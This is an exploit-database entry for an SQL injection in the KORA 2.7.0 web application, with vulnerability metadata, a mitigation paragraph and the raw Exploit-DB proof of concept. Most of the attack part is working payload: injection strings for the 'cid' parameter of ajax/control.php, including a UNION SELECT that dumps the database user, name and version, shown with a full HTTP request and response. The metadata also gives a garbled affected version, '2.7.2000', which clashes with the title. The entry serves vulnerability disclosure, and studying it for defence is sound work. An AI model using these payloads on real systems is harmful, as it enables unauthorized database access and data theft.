KORA 2.7.0 - SQL Injection - exploit.company

vendor:

KORA

by:

Ihsan Sencan

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: KORA

Affected Version From: 2.7.2000

Affected Version To: 2.7.2000

Patch Exists: NO

Related CWE:

CPE: a:matrix.msu.edu:kora:2.7.0

Metasploit:

Other Scripts:

Platforms Tested: Windows 7 x64, Kali Linux x64

2018

KORA 2.7.0 – SQL Injection

The KORA 2.7.0 web application is vulnerable to SQL Injection. An attacker can exploit this vulnerability by injecting malicious SQL queries into the 'cid' parameter of the 'assocSearch' action in the 'control.php' file. This can lead to unauthorized access to the database and potential data leakage.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input and use prepared statements or parameterized queries to prevent SQL injection attacks. Regularly updating the software to the latest version also helps in reducing the risk of such vulnerabilities.

Source

Exploit-DB raw data:

# Exploit Title: KORA 2.7.0 - SQL Injection
# Dork: N/A
# Date: 2018-10-13
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://www.matrix.msu.edu/
# Software Link: https://sourceforge.net/projects/kora/files/latest/download
# Version: 2.7.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
# http://localhost/[PATH]/ajax/control.php?action=assocSearch&pid=1&sid=1&cid=[SQL]&keywords=1
# 
# (CASE WHEN (22=22) THEN 22 ELSE 1*(SELECT 22 FROM DUAL UNION SELECT 66 FROM DUAL) END)
# 
# 1)+UNION+ALL+SELECT+null,null,null,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION())--+-
# 
GET /[PATH]/ajax/control.php?action=assocSearch&pid=1&sid=1&cid=-1)+UNION+ALL+SELECT+null,null,null,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION())--+-&keywords=1 HTTP/1.1
Host: 192.168.1.27
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Date: Fri, 13 Oct 2018 02:01:22 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Set-Cookie: PHPSESSID=pa377tajtaocbeauhd67llk8l4; path=/
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 536
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
#